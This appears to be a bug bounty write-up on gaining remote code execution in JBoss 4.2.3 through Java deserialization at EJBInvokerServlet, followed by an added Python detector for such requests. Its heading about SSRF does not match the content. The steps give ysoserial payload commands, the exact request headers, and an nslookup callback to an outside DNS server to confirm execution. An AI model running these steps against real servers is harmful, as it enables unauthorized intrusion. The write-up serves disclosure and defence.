Utilizing SSRF to Pivot Internal Networks

This is from a private bounty. The internal —-private.com domain was out of scope so I was asked to stop testing once I found the bug.

Exploiting Java Deserialization Via JBoss


First off, I would just like to reference the following sites/authors/tools for helping guide me along this route and providing a sweet tool to make this easy:

I ran into a JMXInvokerServlet/EJBInvokerServlet on a private bug bounty. Generally with these, you can just deploy a JSP shell and be done with it. I was running into some issues with this method and I’m not exactly sure why. However, I was still able to get RCE via this version of JBoss (4.2.3) being vulnerable to the Java Deserialization issue. There was egress filtering on this Windows host that didn’t allow me to perform HTTP, FTP, or telnet. I was able to do DNS lookups though, which will be shown at the end. I was able to determine it was a Windows host due to some file not found-ish error messages.

Steps to Exploit

  1. Grab a copy of ysoserial
  2. Dump your payload into a file:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'fake.exe' > serialdata
  3. If you’ll notice, I used ‘fake.exe’ as an example. Originally I was running commands like wget, curl, python, perl, etc. and I would receive some errors in the serialized response, “The system cannot find the file specified.”
  4. To create your POST request for the endpoint use the following headers:
    POST /invoker/EJBInvokerServlet HTTP/1.1
    Host: site.com
    Accept: */*
    Accept-Language: en
    Content-Type: application/x-java-serialized-object; class=org.jboss.invocation.MarshalledInvocation
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Length: 1400
  5. Right click inside the request tab in Repeater and select ‘Paste from file’ and select the file containing serialized data.
    [Screenshot]
  6. Response (‘cannot find file’ is present):
    [Screenshot]
  7. I then decided to try cmd.exe
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'cmd.exe' > serialdata
  8. Request:
    [Screenshot]
  9. Response (‘cannot find file’ is not present):
    [Screenshot]
  10. From these responses, we can gather that I am able to run cmd.exe. At this point I tried a couple ways of outbound connections; however, I was only able to get DNS lookups to work. Thank you @dawgyg for letting me use your DNS server!
  11. Command:
    $ java -jar ysoserial-0.0.4-all.jar CommonsCollections1 'nslookup mealstest.example.com' > serialtest
  12. External DNS server logs:
    $ sudo tail -f /var/log/messages

    Jul 22 00:10:00 server named[7356]: client 18x.x.x.x#33347: query: mealstest.example.com IN A -EDC (

  13. I suspect I might have been able to copy over dnscat line by line then run the code. However, I am short on time and the RCE was already proven.
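
A defender-side check for the request shape shown in step 4, as an added example that is not part of the original post: it flags POSTs to the invoker servlets whose body carries the Java serialization magic bytes and, where present, Commons Collections class names. The function name, the sample requests and the host `site.example` are constructed for illustration.

```python
import re

JAVA_MAGIC = b"\xac\xed\x00\x05"  # serialization stream magic + version 5
INVOKER_PATH = re.compile(rb"^/invoker/(EJB|JMX)InvokerServlet\b", re.I)
# Class names that Commons Collections gadget chains carry in clear text.
GADGET_MARKERS = (
    b"org.apache.commons.collections.functors.InvokerTransformer",
    b"org.apache.commons.collections.functors.ChainedTransformer",
    b"org.apache.commons.collections.map.LazyMap",
)

def inspect_request(raw):
    """Return the reasons a raw HTTP request looks like a serialized-object POST."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.split(b"\r\n")
    try:
        method, target, _version = lines[0].split(b" ", 2)
    except ValueError:
        return ["malformed request line"]
    headers = {}
    for line in lines[1:]:
        name, sep, value = line.partition(b":")
        if sep:
            headers[name.strip().lower()] = value.strip().lower()
    reasons = []
    if method == b"POST" and INVOKER_PATH.match(target):
        reasons.append("POST to JBoss invoker servlet")
    if b"application/x-java-serialized-object" in headers.get(b"content-type", b""):
        reasons.append("serialized-object content type")
    # Inspect the body regardless of headers: a client can omit or misname them.
    offset = body.find(JAVA_MAGIC)
    if offset != -1:
        reasons.append(f"Java stream magic at body offset {offset}")
        reasons += [f"gadget class {m.decode()}" for m in GADGET_MARKERS if m in body]
    return reasons

# Constructed samples: magic bytes plus a class-name string, not a real payload.
SAMPLE = (b"POST /invoker/EJBInvokerServlet HTTP/1.1\r\nHost: site.example\r\n"
          b"Content-Type: application/x-java-serialized-object; "
          b"class=org.jboss.invocation.MarshalledInvocation\r\n\r\n"
          + JAVA_MAGIC + b"..org.apache.commons.collections.map.LazyMap..")
BENIGN = b"GET /index.jsp HTTP/1.1\r\nHost: site.example\r\n\r\n"

if __name__ == "__main__":
    for request in (SAMPLE, BENIGN):
        print(inspect_request(request))
```

A hit on the magic bytes at an invoker path is worth alerting on even when no gadget marker matches, since the marker list only covers one library.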